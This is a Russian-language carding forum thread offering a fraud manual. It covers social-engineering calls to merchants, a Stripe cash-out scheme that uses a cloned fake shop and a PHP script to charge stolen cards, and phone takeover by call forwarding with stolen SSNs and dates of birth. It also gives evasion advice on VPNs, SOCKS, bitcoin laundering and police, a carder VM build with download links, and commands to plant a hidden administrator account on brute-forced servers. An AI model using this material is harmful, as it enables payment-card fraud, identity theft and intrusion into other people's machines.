Агент: Спасибо большое, мистер Стоун. Мы отправим вам ваш ордер, сегодня.

Заметили сколько трудностей в этом диалоге? Вы должны заставить поверить их, что имя на адресе доставки, арендатор по этому адресу. К примеру, если имя кардхолдера, Джимми Стоун, вы можете отправить его на имя Дэвид Стоун, и сказать что это ваш сын. Но проверьте эту информацию в бэкграунде, и имейте их данные о дате рождения, иногда они могут спросить вас.

Также хорошо будет избегать, Hotmail адреса, любой можешь сделать фальшивую почту, под именем другого. В идеале будет хорошо если у вас будет свой домен и почта на нем. Если вы прочтете следующую главу (слив методом Stripe), вы увидите насколько это легко. Допустим ваш фэйковый шоп Besclothes.com, а имя вашего кардхолдера Джимми Стоун, вы можете создать емэйл [email protected], и это будет выглядеть как коммерческий адрес, и понизит фрод очки.

Поверьте мне, это играет большую роль, при кардинге трудных мерчантов.

В следующий раз, убедитесь что вы сможете поднять телефон, когда они звонят по нашему “биллинг номеру”. Если вы все сделаете правильно, значит вы готовы забрать ваш ордер. Они не будут спрашивать, кучу документов, все было сделано по телефону.

1.9 – Слив через Stripe

Если вы не особо заинтересованы в вещевом кардинге, возможно вас заинтересует, как делать кэш из карт. Для этого способа вам понадобятся:

1) Пачка карт 2го уровня (адрес необязателен)

2) Программа HTTrack (может быть скачана бесплатно)

3) Notepad++

4) Счет дропа в банке

5) Мертвая фуллка ( ФИО,адрес,SSN,DOB)

6) Обычная навыки для работы с компьютером

Первым делом идем на Stripe.com и смотрим, если ли в списке ваша страна. Если нет, вы должны найти дропа, в той стране которой планируете работать, США легче всего.

Первый шаг, создание фэйкового онлайн шопа. Это очень легко,прогуглите что то наподобие, “купить брэндовые вещи”, прыгайте на 15 страницу поиска, чтобы найти шопы поменьше.

Постарайтесь найти магазин, у которого простой дизайн, товаров около 100-200. Большие не нужны. Выберите тот, который не использует Javascript очень много. Возможно вам придется просмотреть 4-5 шопов, чтобы выбрать подходящий.

Затем откройте программу HTTrack, начните новый проект, и скопируйте этот вебсайт. Программа создаст копию этого сайта у вас на компьютере, постарайтесь не выходить за рамки 800-1000 мб.

Ах да и необязательно стоять возле компьютера, можете заняться своими делами.

Следующий шаг, редактирование информации в Notepad++, зайдите в контактную информацию клонированного сайта, и начинайте все менять на свой лад, если на настоящем сайте была google maps,не забудьте отредактировать и его тоже. Вот тут то, нам и пригодятся, обычные навыки для работы с компьютером. Если вы понятия не имеете, как работать с HTML, я бы посоветовал вам пройти, быстрый онлайн курс, это очень полезно, и обязательно пригодится. Его очень легко выучить.

Загляните везде, Privacy & Policies, Terms of use, где может быть лишняя инфа о настоящем сайте, и меняйте всю инфу на свою. Используйте логику. Итак, теперь у нас есть свой шоп, на который ушло, менее часа. И вы уже ведете легальный бизнес!

Используйте Notepad++ чтобы выполнить поиск и автозамену, для фраз “<!-- Mirrored[^>]*GMT -- >” и замените их ни на что. Это удалит все слова “Mirorred”, которые создала программа. В любом случае, у вас скорее всего, будет куча папок в директории сайта. Допустим что клонирование закончилось успешно. И у нас есть папка www.fakeshop.com и img.fakeshop.com. И вы хотите переместить папку img.fakeshop.com в www.fakeshop.com. Для это сделайте поиск и “…/img.fakeshop.com” и замените на “img.fakeshop.com”, и все будет в порядке. Повторите это для каждой подпапки которая у вас есть. Убедитесь что index.html рабочая, и все выглядит замечательно. Найдите номер старого сайта и поменяйте его, на какой нибудь бесплатный. Все равно нам никто не позвонит. То же самое проделайте с адресом. Для телефона убедитесь что вы написали его в таком формате 123-345-6789 или 123.233.21311, и так далее. Проверьте все дважды. Теперь избавимся от старых емейлов, найдите все упоминания “@realshop.com” и замените его на наш “@fakeshop.com”. Проверьте все очень тщательно, поменяйте название папок которые содержат что либо о “realshop”, и заменяйте его нашим. Чтобы никто не догадался что этот шоп фэйковый. Вы можете поменять логотип, если вы очень ленивы, хотя бы просто переименуйте его, или поменяйте путь к картинке, и тогда в браузере просто будет отображаться “image not found”, да и похуй.

Итак мы закончили! Проверьте все в последний раз и приступим к следующему шагу.

А следующим шагом будет хостинг. Очень важно юзать анонимный хостинг, к примеру bitcoinwebhosting.net. Я использовал его, для большинства моих, фрод сайтов. Используйте мыло на Hotmail, которое бы подходило к информации о кардхолдере, из мертвой фулки, откройте аккаунт, у хостинга, и грузите свои файлы. Почти все хостинги, позволяют регистрировать домены. Они могут спросить у вас адрес, так просто дайте им адрес кардхолдера. Настройте аккаунт, зарегистрируйте домен, и грузите свой файлы для фэйк шопа. Загрузите их через FTP (если вы незнаете, что это, пройдите краткий ликбез). Удостоверьтесь что ваш шоп онлайн, и работает отлично. Предположим что ваш сайт myfraudsite.com. Убедитесь что ваш сайт отображается, и вы можете серфить по нему. Затем создайте емейл адрес, относящийся к этому серверу, с префиксом админ, в нашем примере это будет [email protected]. Это делает вас более легальным. На этот момент у вас должен быть рабочий онлайн шоп, и емейл шопа. Все должно быть расположено на анонимном хосте. Обычно они чарджат 10$ в биткоинах. Теперь мы готовы делать деньги на нашем сайте. Откройте аккаунт на Stripe.com используя емейл адрес, и оставьте аккаунт в тестовом моде. Создайте страницу и назовите ее “charge.php”,и загрузите его на ваш шоп. Это будет файл который будет использоваться при чардже. Тут мы должны написать код к странице, вы можете его сделать по своему усмотрению, но мой собственный пример:

Code:
<?php

require_once('./lib/Stripe.php');

Stripe::setApiKey("sk_live_xxxxxx"); //<- This is your Stripe key

try{

echo "Processing...";

Stripe_Charge::create(array(

"amount" => $_GET["amount"],

"currency" => "usd",

"card" => array(

"number" => $_GET["number"],

"exp_month" => $_GET["month"],

"exp_year" => $_GET["year"],

"cvc" => $_GET["code"]

),

"description" => "This will appear on the card statement"

));

echo "Charge OK"; //Success!

}

catch (Exception $e){

$error = $e->getMessage();

echo "Error: ".$error; //Failure.

}

?>

Попробую объяснить вам, что это значит. Вы вызовите страницу, следующим запросом:

http://myfraudsite.c...333&amount=6800

Это счарджит карту на сумму 68$, номер которой 4266 8412 0000 0000 exp date February 2016 с CVV кодом 333. Надеюсь доступно обьяснил. Можете поменять как вам угодно, измените сумму, подключите любые карты которые у вас есть. Придумывайте много вариантов в тестовом моде, как будто вы действительно очень заняты тестом. Делай чарджи, и смотрите результат. И так много раз. Когда вы и сами действительно убедились что все работает, переключайте режим в Live. У вас спросят, данные, такие как имя, адрес, DOB и 4 последние цифры SSN, просто дайте им что они хотят. Проигнорируйте часть про налоги, просто впишите адрес вебсайте, придумайте краткое описание, и входите в Live режим.

Затем они спросят у вас, информацию о банке. Вы должны будете передать Routing number и account number, банка, счет в котором у вас есть на дропа. Как только заполнили всю информацию время делать деньги. Вам нужны карты, много карт, просто идите в автошоп, и закупитесь, вам понадобятся только номер карты, exp date и CVV код. Можете попробовать Vault Market, в момент написания там были карты по 4$. Но не разгоняйтесь очень сильно, так как они могут просто заблочить ваши операции. И переходите к следующей части, пока вы не сошли с ума, вбивая все карты.

Первое что вы должны запомнить, что у вас должны быть апрувед, более чем 50% транзакций. Это значит, что валид карт должен быть неплохим. Если слишком много деклайнов на карте, они просто сделают рефанд всем картам, и закроют ваш аккаунт.

Второе, вы должны использовать карты той страны, где находится наш предполагаемый шоп. То есть если у вас UK шоп, вы должны использовать UK карты, даже если они дороже. Не 100% конечно, но 90% уж точно, чтобы избежать подозрений.

Третье, сумма транзакций, играйте с цифрами, от 50 до 300 за транзакцию. Не надо больше чем 300, возможно что нарветесь на деклайн, и не сможете уложиться в 50% валид. Нас не должны засечь. Также ждите между транзакциями, как бы сильно вы не любили деньги, все мы любим деньги, но все должно выглядеть реально.

Остальное должно быть нетрудным. Деньги за первую транзакцию через 7 дней. И так далее в последующие дни. Подскажу вам один трюк, он тестировался раз, и был успешен: анон карта.

Нам нужно остерегаться чарджбеков (поговорим о них позже), которые придут раньше 7 дней, и этим способом мы можем обойти их. Когда ваш аккаунт в лайв моде и все работает, сделайте транзакцию около 100$ (эти деньги все равно упадут к вам на счет в банке), и через 3 дня, используйте другую карту, на 50$, когда закончите, продолжайте бить обычный картон.

Таким образом вы перейдете 7ми дневный барьер, который мог вас закрыть.

Так что по поводу чарджбэков? Если холдер откроет диспут, большинство придут с пометкой “fraud”, вы получите емейл, говорящий о том, что нам нужно будет заплатить 15$, и эта сумма будет списана при следующей транзакции. Далее все зависит от вас, если вы считаете, что количество чарджбэков, не превысит количество карт которые у вас есть. Просчитайте все, и когда будет приходить слишком много чарджбэков, начинайте сливаться. Чтобы слиться вам необходимо, закрыть счет в банке, или поменять account number банка. Удалите все файлы с вашего хостинга, и загрузите новые файлы, нового фэйк шопа, новый домен, новый страйп аккаунт, и все заново. Делайте столько пока ваш кошелек не станет рваться от денег, я сделал достаточно неплохо денег, и этот метод вряд ли выгорит. И всегда можно найти аналоги, которые лично у меня уже есть.

1.10 – От ATO к PTO

Когда вы делали ATO (Account Take-Over fraud), вы захватывали контроль над аккаунтом кардхолдера. Даже если вы поменяли номер в файле банка, у них до сих пор остается предыдущий номер. Это очень действенный метод. Но бывают и провалы, давайте передам вам диалог который случился у меня несколько месяцев назад, и вы поймете о чем я.

Я: Здравствуйте, я звоню вам по поводу своей покупки, которую хотел совершить, на Newegg, но почему то мою карту отклонили, сумма ордера 1500$.

Агент: Без проблем мистер Стоун, давайте я посмотрю, что могу для вас сделать, можете вы пожалуйста побыть на ожидании. (по своему опыту могу сказать, что если они держат на удержании слишком долго, скорее всего вы прогорели,в моем случае, я прождал 5 минут)

Агент: сэр?

Я: Да мадам, я все еще жду.

Агент: к сожалению, я более не могу пропустить этот ордер, и на этом аккаунте в целом.

Я: А что по поводу моей карты? Что я должен делать?

Агент: вы можете уничтожить карту, так как вы, не Джим Стоун.

Как видите, ситуация очень печальная, но тут есть способ обхода. Это должно быть сделано до звонка банка. Что если агент позвонил на предыдущий номер кардхолдера, даже если я поменял номер несколько дней назад. Картхолдер примет звонок, остальное представьте сами.

В первую очередь, возьмите настоящий номер кардхолдера, и пробейте через whitepages, чтобы найти кто хозяин. Если вы не сможете найти, тогда используйте Spooftel и звоните основным провайдерам (AT&T, Verizon, Sprint, etc) и используйте их автоматическую систему, чтобы найти, на кого зарегистрирован номер. Вы можете использовать phonevalidator.com, чтобы определить, мобильный ли это номер, или городской. В бэкграунд репорте, вы можете найти много телефонов. Определить провайдера сотового легче всего, большинство из них позволяет нажать * чтобы войти в голосовую почту, и по приветствию вы сможете распознать провайдера.

Используйте логику и выпишите номера

номер 1, городской, 555-123-456, Verizon

номер 2, мобильный, 666-234-5678, AT&T

Помните, у вас есть, полный адрес, DOB, SSN, и еще много информации о кардхолдере, и вы знаете что за телефонная компания. Что мы должны сделать??? Правильно, ПЕРЕАДРЕСАЦИЯ! Позвоните в телефонную компанию, использую противоположный номер ( если билинг номер городской, используйте сотовый, или наоборот), заспуфьте номер. Когда вы говорите со службой поддержкой, вы можете вести диалог в таком русле. Не забывайте, что это не банк, и у них не такая защита. Это вообще не относится к деньгам для них. Но не переборщите, могут быть последствия.

Агент: Спасибо, что позвонили в Verizon, моё имя Стив, как я могу помочь вам?

Я: Здравствуйте, я уезжаю ненадолго, с дому, но я должен принять важный звонок на мой городской, так как я не смогу принять его дома, могу ли я подключить переадресацию на мой сотовый телефон?

Агент: Да конечно, можете сказать как вас зовут?

Я: джимми стоун

Агент: Спасибо мистер Стоун, какой ваш полный адрес?

Я: 123 fake Street, Washington DC, 12345.

Агент: Спасибо, дата вашего рождения?

Я: 1 октября, 1965г.

Агент: Спасибо. Вы знали что вы могли нажать *72 на вашем телефоне и активировать переадресацию?

Я: спасибо за совет, но в любом случае я не дома, потому не смогу этого сделать.

Агент: ок, без проблем, я активирую за вас. На какой номер вы хотите поставить переадресацию?

Я: вот мой сотовый номер 456-123-3245 (ваш телефон)

Агент: хорошо, вы хотите подключить ее сейчас?

Я: да, пожалуйста

Агент: активировано, когда вы будете дома, вы можете нажать *72, чтобы отключить переадресацию, чем нибудье еще могу я вам помочь?

Я: нет, спасибо.

Некоторый телефонные компании, вроде AT&T, могут спросить 4 значный пин, но это можно обойти используя, DOB и последние 4 цифры SSN. Если вы не конченый неудачник, все должно пройти как по маслу, это я называю PTO (Phone take over Fraud). Оно придумано очень опытным кардером.

Теперь вы готовы звонить в банк для ATO. Если они решат позвонить по билинг номеру (что случается очень редко), вы ответите на звонок, и это уничтожит все подозрения. Кардхолдер, снова потеряет контроль над аккаунтом, но это уже не наши проблемы. Когда вы закончите дела, не забудьте позвонить в Verizon, чтобы отменить переадресацию. Не будем лишать кардхолдера звонков от друзей. Если вы думаете что нуждаетесь в его номере еще некоторое время, используйте RingCentral, и вы будете решать, какие звонки вы хотите принять, а какие вы отправите дальше по назначению. Он никогда не узнает, что кто сношается с его телефоном.

Некоторые сайты не требую чтобы шиппинг адрес был в файле компании, в этих случаях вы просто проделываете PTO без ATO, и поставите верный биллинг номер на вебсайте, примите звонок от них, и подтвердите ордер. Вобщем используйте свое воображение.

Глава 2 - Безопасность

Эта глава посвящена безопасности. Получение бесплатных товаров, это весело, но это неочень веселит полицию. Я дам вам советы, для защиты в сети, но я не буду проводить полный ликбез по установке программ и так далее, этой инфы полно в интернете.

2.1 – Защита в сети

Давайте порассуждаем, как можно защитить себя в сети. Для этого у нас есть 3 незаменимых друга.

1 Друг: VM

VM (Virtual Machine) - это VirtualBox или VMWare, используйте по своему усмотрению и желанию.

Это как компьютер в компьютере. Ваш компьютер это “сервер”, а ваша виртуалка это “гостевой компьютер”. В виртуалку, переложите все связанное с кардингом. НИКОГДА не храните софт и записи относящиеся к фроду, на свой компьютер. Не оставляйте никаких доказательств на своей машине. Как только ваша виртуалка настроена, создайте Truecrypt раздел, и положите ваши VM-файлы туда. Подключайте свой TrueCrypt раздел только тогда, когда вы хотите получить доступ к кард софту.

Используя True Crypt, вы будете уверены что все ваши VM файлы защищены, и все что относится к кардингу, растворяется когда компьютер выключен, и вам нужно будет декриптовать раздел, чтобы получить доступ. Так что, если полиция ворвется к вам, просто выключите питание, и аусть ломают голову как доказать. Нет надобности удалять файлы, там и там, если они заберут комп на экспертизу, они ничего не найдут. Ваш VM полностью невидим, и подключается, только тогда когда вам нужно что либо скардить.

Теперь когда ваш компьютер защищен физически, вам необходимо, защитить себя в сети. Если ваши познания о VM и TrueCrypt малы, вы должны поискать информацию, они полезны не только в кардинге.

2 друг: VPN

VPN – это способ, скрыть информацию о себе, и быть анонимным. Он направляет весь трафик с вашего компьютера на VPN сервер, и скрывает вашу личность, перенаправляя трафик в желаемый сайт. Я сам использовал PureVPN, но вы можете выбрать любого которого захотите по вашему желанию. Если вы не используте VPN ваш IP адрес будет виден. Все что нужно будет полиции это позвонить провайдеру, и по этой информации, схватить вас за задницу. Поэтому использование VPN, жизненно необходимо. Когда настроите VPN зайдите на check2ip.com или ip-score.com, чтобы определить свое местоположение. Убедитесь что все работает как надо. И он не показыает ваше реальное местоположение. С VPN вы анонимны, и все что вы делаете скрыто. Но есть одна проблема, мерчи тоже знают это. И они понимают что вы хотите остаться анонимным, не потому что, стесняетесь, а потому что возможно хотите сделать что то незаконное. Большие мерчи, имеют список, многих VPN серверов, и добавляют фрод очки, когда вы пытаетесь сделать ордер с этих адресов. Наш следующий друг здорово поможет нам, решить эту проблему.

3 друг: SOCKS

Некоторые называют их носками. Так что же это? Все просто, когда мы хотим провести ордер, и хотим чтобы мерч думал что я кардхолдер. Если вы последуете по сайту vip72.org или 5socks.net, вы можете купить там соксы многих стран и городов. Если вы выберете город в котором живет кардхолдер, вы будете выглядеть как будто вы с этого города, что увеличит ваши шансы, на то, что ордер пройдет. Каким софтом пользоваться вы выберете сами, нету смысла дискутировать. Но всегда проверяйте носки на blacklist, лучше всего подходит для этого ip-score.com, там вы можете посмотреть свой RiskScore, если он больше 1,8, лучше не проводить ордер, идеально довести его до 0. Используйте соксы через VPN, и вас врядли обнаружат.

Часто на форумах я вижу, как нам связать TOR и VPN? Очень просто, первое- не используйте TOR.

Используйте любой какой душе угодно браузер, даже если Google Chrome.

Порой кардеров ловят по нику на форумах. На TCF и EvoMarket, сидят дюжины полицейских, и они охотятся там за очень выебистыми, глупыми кардерами. Не используйте свои белые ники на грязных форумах. Это просто лишняя зацепка. Не разговаривайте по скайпу, да даже по телефону, с незнакомыми и знакомыми типами, распознавание по голосу никто не отменял. Они могут проверить, ваш дроп, посмотреть были ли когда, нибудь левые доставки до ваших друзей или подруг.

2.2 - Телефония

В этой главе мы поговорим о телефонии, чтобы звонить в банки безопасно, и чтобы нас не отследили. Если вы хотели использовать домашний телефон, желаю вам удачи в 4х стенах.

Первым делом, зарегистрируйтесь на RingCentral,( вы можете скардить аккаунт 2м уровнем карт), где вы купите телефонный номер, и будете выдавать себя за кардхолдеров. Они попросят номер, по которому захотят позвонить вам. Откланяйтесь и скажите что вы сейчас на работе, и позвоните им через некоторое время, позвоните им, и согласитесь с их планом. Вы можете сказать что у вас командировка на пару месяцев, и вам нужно IP телефония, для того чтобы дешево связываться с родными. Этот процесс нетруден.

Как только у вас есть аккаунт Ringcentral, настройте его, потратьте время чтобы изучить настройки и так далее. Вы можете выбрать штат и город. Они часто меняют интерфейс, потому я не буду вдаваться в подробности, но убедитесь что все ваши палевные номера, будут идти на левый телефон. К примеру вы можете взять городской телефон, где есть конфигурация SIP, используйте переадресацию порта на ваш роутер, если ваш роутер поддерживает это, настройте VPN на WAN соединении, и у вас будет телефон доступный 24/7. Левый телефон тоже подойдет, но там нет VPN, это уже опасней, вы можете взять пачку сим карт, но IMEI можно отследить, потому если есть возможность брать 10$ телефоны, и выбрасывать их после каждого большого дела.

Если вы выбрали городской телефон, его не надо выбрсывать, так как у вас будет VPN. Я использую именно этот способ. Убедитесь что вы можете принимать звонки, от мерчантов, и подтверждать ордера, так как пропущенный звонок, почти синоним отмены ордера, они ебать какие параноики впоследнее время. Polycom,Aastra или Cisco телефоны отлично подходят под это дело, также они поддерживают две SIP линии, что позволит вам, иметь номер для фрода, и обычный номер.

Как только приходит чардж, на RingCentral, просто сделайте новый аккаунт. Когда будете делать подмену номера кардхолдера, можете использовать эти 2 сервиса: Spooftel и SpoofCard.

Spooftel принимает только биткойны, но они очень дешевые, всего 0,10$ за минуту, любой номер, и они не блокируют номера без причины.

Spoofcard принимает кредитки (вы можете использовать их картами 2го уровня), но часто звонки обрываются через каждые 30 сек, без какиз либо причин, поэтому я предпочитаю Spooftel, хоть и должен платить легально).

Но также будьте осторожны, полиция может прижать эти 2 компании, и они сдадут номер с потрохами, поэтому не используйте, свой настоящий телефон для разговоров, чтобы вас не смогли отследить. Используйте левый телефон со spooftel для максимальной безопасности.

2.3 - AVS

AVS (Address verification system), система сверки адресов, используемая антифродом, для подтверждения биллинг адреса.

Это работает только с цифрами (номер дома и зип код), и сверяет их с файлами в банке, к примеру 123 Cardholder Street будет тоже самое что 123 Fraud Street. Индекс сверяется полностью, поэтому тут не ошибитесь.

Почему AVS так важен? Потому что это автоматически отсеивает карты где адрес не совпадает. Если картхолдер не может написать свой собственный адрес верно, мерч ни на секунду не поверит что это настоящий картхолдер. Много селлеров картона продают нон-avs карты. Они хороши? Давайте проверим.

Скажем у нас есть non-avs Amex card с колумбии (они очень популярны). Люди юзают их в онлайн магазинах, и ставят биллинг адрес и шипинг адрес одинаковым, надеясь что карта пройдет AVS.

Но…

Умный антифрод агент видит, что BIN с колумбии. И каков шанс, что кто то с колумбийской картой, имеет биллинг адрес на файле, особенно когда знает, что карта non-avs? Верно, это бредово.

Ожидайте что ордер отменят, если конечно фрод агент не совсем тупой (но они в наше время, очень и очень умные). Non-avs карты должны браться с предостережением. Не мечтайте скардить ими серьезные шопы, только потому что, на этих картах нету AVS.

2.4 - Самые распространенные ошибки

Тут я хочу поговорить которые совершают новички, когда начинают работать, некоторые из них могут быть фатальными.

1. Выебоны

Когда вы получаете халявные паки, не надо гарцевать перед друзьями, телками, и левыми типами, вы не можете знать, возможно кого нибудь заденете, и он решит сдать вас, не болтайте много, и держите это при себе.

2. Связывать кардинг со своей настоящей жизнью

Не таскайте вещи на адреса, друзей, подруг, семьи, и тем более СВОЙ, если полиция начнет допрос, у вас нет гарантий, что вас не выдадут под угрозой, не слишком доверяйте людям, все сначала думают о своей заднице, потом о вашей.

3. Начинания с крупного

Когда вы только начинаете кардинг, не лезьте на гигантов, типа TigerDirect, Apple, Newegg. Их не так просто скардить, и неудачами вы получите неприятное ощущение о кардинге, до того как вы получите свой бесплатный пак. Начните с малого, допустим, вещи.

4. Использование одинаковых ников на хак бордах и чистых сайтах

Большинство новичков забывают об этом, и да, правоохранительные органы не дремлют, они есть на всех крупных бордах, тем более TCF,EVO, не считайте ТОР безопасным, это далеко не так. Используйте на всех бордах разные никнеймы.

5. Подписывать своей подписью при принятии посылок

Когда получаете пак, не подписывайте своим именем. Если спросят имя, придумайте любое, они не спрашивают ID. Если вы правша, подписывайте левой рукой. Мелочь, но может уберечь вас впоследствии.

6. Не отмывание биткоинов

Если вы покупаете (или кардите) битки через Virwox, они могут определить куда ушли биткойны по blockchain. Используйте сервис типа BTC Fog чтобы отмыть их, и вы получите чистые биткоины, по которым вас нельзя отследить.

7. Разговоры на отслеживаемых сайтах

Не пользуйтесь, Facebook, VK, для разговоров о кардинге, используйте OTR, или хотя бы ICQ через VPN, убедитесь что вас не отследить

8. Неуверенность при прозвоне

Когда вы делаете ATO, оставайтесь спокойны, не запинайтесь при ответах и не запутывайтесь. Если вы ответите неверно ( у них очень часто бывает неверна записана информация), будьте спокойны, и обьясните свою точку зрения, помните, карта ваша. Не показывайте волнения, иначе они подловят вас.

9. Использование одних и тех же дропов

Да, найти хороший дроп трудновато, но для наибольшей убедительости, находите всегда девственные дропы. Если используете пару раз, не надо рисковать и быть пойманным, дроп хорош на 3-5 раз, затем пора уходить.

10. Заход на fake shop без VPN

Когда ваш Stripe Account сгорает, они дают доступ к логам, в которых могут обнаружить ваш IP, чего вы конечно не хотите. Всегда используйте VPN для загрузки файлов и так далее.
 
Last edited by a moderator:

Carding

Professional
Messages
2,831
Reputation
17
Reaction score
2,018
Points
113
Оглавление

Методичка # 0 — Вступление
1. Оглавление
2. Введение в терминологию

Методичка # 1 — Безопасность
1. Общий вид идеальной безопасности
2. Альтернативный вид работы
3. Virtual Box
4. VMware
5. VPN
6. Работа с дедиками
7. Socks 5
8. SSH-туннели

Методичка # 2 — Идеальная система для работы
1. Идеальная машина для вбива
2. Энциклопедия программного обеспечения кардера

Методичка # 3 — Начало работы
1. True Crypt/аналоги
2. Обычный шоп с оплатой кредитными картами
3. Биллинг/шиппинг
4. АВС, сверка имени/адреса, запрос дополнительных данных
5. Credit card (cc)
6. Виды карт
7. VBV/MCSC
8. Шопы CC
9. Чекеры, донаты

Методичка # 4 — Вбивы
1. Настройка системы для вбива
2. Разбор вбива (на примере прямого вбива USA)
3. e-gift, его вбив и использование
4. Прямой вбив EU картона
5. Запрос дополнительной верификации

Методичка # 5 — Прикладные вопросы
1. Поиск шопов
2. Доставка паков и список 286 посредников в 19 странах мира
3. Методы монетизации

Из Нуба в Кардер Папу - Live Mentorship [Перевод]

Все уроки переведены. За перевод сильно не пинайте - переводил человек, не имеющий к кардингу отношения. В целом, я думаю, все будет понятно.

Идеальная машина для вбива

Выбираете версию, нажимаете на кнопку, следуете инструкциям.

Win XP VMware
1. Качаем и устанавливаем VMware v10
2. Качаем сборку, разархивируем https://mega.co.nz/#!SQ4nlL4C!LXfEX92DqswNkuZTYhOdZOSRToF2Mx0G76fF3Fn08I8
3. В VMware нажимаем Ctrl+O, или File->Open, открываем сборку MrGood

Win 7 VMware
1. Качаем и устанавливаем VMware v10
2. Качаем сборку, разархивируем https://mega.co.nz/#!ecAiVara!yCyOpm7cjEfsSR1m8kyn2fW-bSEVXjWCVa_9lZcOyfk
3. В VMware нажимаем Ctrl+O, или File->Open, открываем сборку MrBright

Win 7 VBox
1. Качаем и устанавливаем VirtualBox
2. Качаем сборку, разархивируем https://mega.co.nz/#!aNhEgJ6B!TaGrqm_c8JDdFxLXQXpt_eClT2FI0q_J68QKFEiwpBE
3. В VirtualBox открываем сборку MrGenerous

В разработке:
Win XP VBoxКачаем и устанавливаем VirtualBox
Качаем сборку, разархивируем.
Открываем сборку в VirtualBoxSpoiler: RU Win XP VMware1. Качаем и устанавливаем VMware v10,
2. Качаем сборку, разархивируем
3. В VMware нажимаем Ctrl+O, или File->Open, открываем сборку.

Частозадаваемые вопросы:
Как сделать так, чтобы не настраивать систему каждый раз под себя?
Настройте виртуалку под себя так, чтобы можно было сразу вбить. Выключите её и больше не трогайте. Для вбива делаете её клон и вбиваете с него.

Стартовая страница Ghostery открывается каждый раз при запуске браузера, почему?
Нужно пройти приветствие, чтобы настроить, что плагин будет блокировать, а о чем только предупреждать. Опять же, настраиваете 1 раз на каждый браузер в исходной виртуалке, в зависимости от ваших нужд.

Почему не работает R-Wipe & Clean?
В первых двух сборках он не крякнут, поэтому вам нужно скачать вот это и следовать инструкциям:
SpoilerПосле перезапуска программы всё должно быть ок. Со следующим апдейтом будет исправлено.
Что в сборке:
Множество браузеров на любой, даже самый изощренный вкус. Скореё всего, такое количество даже покажется излишним, но на размер системы влияет несущественно. Да и всегда удобно иметь под рукой лишний браузер. Если мозолят глаза, просто удалите иконки неиспользуемых вами.
ˆ Никакого софта в автозагрузке
ˆ Небольшой список полезных ссылок
ˆ DNS Google
ˆ Уменьшено число ненужных анимаций

Браузеры:
SRWare Iron — браузер на основе Chrome для безопасной и анонимной работы. Сравнение Iron и обычного Chromehttp://www.srware.net/ru/software_srware_iron_chrome_vs_iron.php
Iron Incognito — тот же браузер в анонимном режиме --incognito (куки сохраняются только на текущий сеанс и чистятся при перезапуске)
Firefox classic + home + hybryd + safe — портативная сборка с четырьмя режимами:
ˆ Режим Classic предоставляет пользователю возможность поработать с обычной версией браузера.
ˆ Режим Home избавит вас от всплывающих баннеров и тизеров, которые мешают быстро загружать страницу. abp и ghostery
ˆ Режим Hybrid, оптимизированный режим для улетного серфинга в интернете. abp и ghostery
ˆ Режим Safe, обеспечивает максимальный уровень безопасности пользователя. Все следы работы в браузере удаляются после его закрытия. abp и ghostery
Mozilla Firefox — обычный свежеустановленный, abp и ghostery
Google Chrome — обычный свежеустановленный, abp и ghostery
Opera — обычный свежеустановленный, без изменений
Safari — обычный свежеустановленный, без изменений
Tor Browser Bundle — Анонимная сеть виртуальных туннелей, предоставляющая передачу данных в зашифрованном виде плюс последняя версия браузера Firefox. В папке installers есть установочный файл болеё старой версии, в которой vidalia отдельно.
Andy Browser — Iron + Tor. Версия 2.1, на старой версии Tor.

Отмывка PC:
CCleaner+Enhancer — всеми знакомая и любимая программа для очистки куков/кешей и другого мусора, а также разрешения проблем регистра
R-Wipe & Clean — удаляет оставшуюся информацию о работе 600+ приложений, включая Microsoft Office 2007 и Skype
CCtools 7 — позволяет изменять индетификаторы компьютера, хоста, S/N браузера и windows, название процессора и многое другое.
Расширенный список процессоров.
STZBlaster — аналог CCTools. Находится в папке installers.

Маскировка и безопасность:
Proxifier — must have для анонимности.
Bitvise — клиент для SSH-туннелей.
Plinker — альтернатива Bitvise. Намного хуже, но на всякий случай есть в папке Installers, вдруг понадобится.
OpenVPN — свободная реализация технологии Виртуальной Частной Сети (VPN) с открытым исходным кодом для создания зашифрованных каналов типа точка-точка или сервер-клиенты между компьютерами.
OpenVPN Protector — защищает от внезапного обрыва связи с VPN чтобы не засветить ваш реальный айпи. На любителя, сам к таковым не отношусь (хватает проксифаера).

Связь:
Pandion
Psi
Pidgin

Почта:
Mozilla Thunderbird
Postbox

Essentials:
Skype
Vbivotron 2014 v1.2 — преобразует информацию из буфера обмена в ручной ввод, имитируя действия живого пользователя.
Foxit Reader — свободный pfd-ридер
Notepad++ — свободный текстовый редактор с открытым исходным кодом. Поддерживает открытие болеё 100 форматов. Можно вызвать из контекстного меню файла
Winrar


Работа с дедиками
Выделенный сервер (dedicated server, также дедик) — вид хостинга, при котором клиенту целиком предоставляется отдельная физическая машина. Обычно используется для запуска приложений, которые не могут сосуществовать на одном сервере с другими проектами или имеют повышенные требования к ресурсам.

Как подключиться к дедику?
Подключиться к дедику можно с помошью встроеного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск => Программы => Стандартные => Связь => Подключение к удаленному рабочему столу.

На что требуется обращать внимание при выборе дедика?
Скорость интернет соединения, Память(RAM), Камень(процессор), ОС. Вот примеры:
Win2003 Ram 1gb CPU 3 Pentium 4 Америка
Входящая скорость 4.57 Mбит/сек
Исходящая скорость 1.49 Mбит/сек

Для чего нужен дедик?
Дедик подходит для любых дествий для которых вам нужно сменить свою геолокацию.
Любые кардинг-темы в которых вам нужно сделать геолокацию под кардхолдера.
Также применяют для брута, спама, флуда, ддоса и многого другого. В общем, для всех тех операций, которые требуют продолжительного включенного компьютера и его нагрузки.

Где достать дедик?
Есть два способа:
1) Это, конечно же, покупка. (В полезных контактах форума можно найти селлеров)
2) Сбрутить самостоятельно.

Правила работы с дедиками!
Запускаем командную строку (Пуск > Выполнить > cmd.exe) и пишем в ней следующеё:
net user Имя_пользователя пароль /add
net localgroup Administrators Имя_пользователя /add
net localgroup "Remote Desktop Users" Имя_пользователя /add
net accounts /maxpwage:unlimited

Теперь давайте разберём каждую команду:
net user Имя_пользователя пароль /add - Добавляет нового пользователя с указанным именем и паролем
net localgroup Administrators Имя_пользователя /add - Добавляет нужного пользователя к группе администраторов
net localgroup "Remote Desktop Users" Имя_пользователя /add - Добавляет нужного пользователя к группе удалённых пользоваелей
net accounts /maxpwage:unlimited - позволяет избежать истечения срока действия пароля (14 дней)

Например если ты хочешь создать учётку с именем user и паролем password,то команды будут выглядеть так:
net user user password /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited

Отлично, учётка создана. Теперь нам нужно её скрыть из винлогона, чтобы твоя учётка не светилась среди других пользователей.
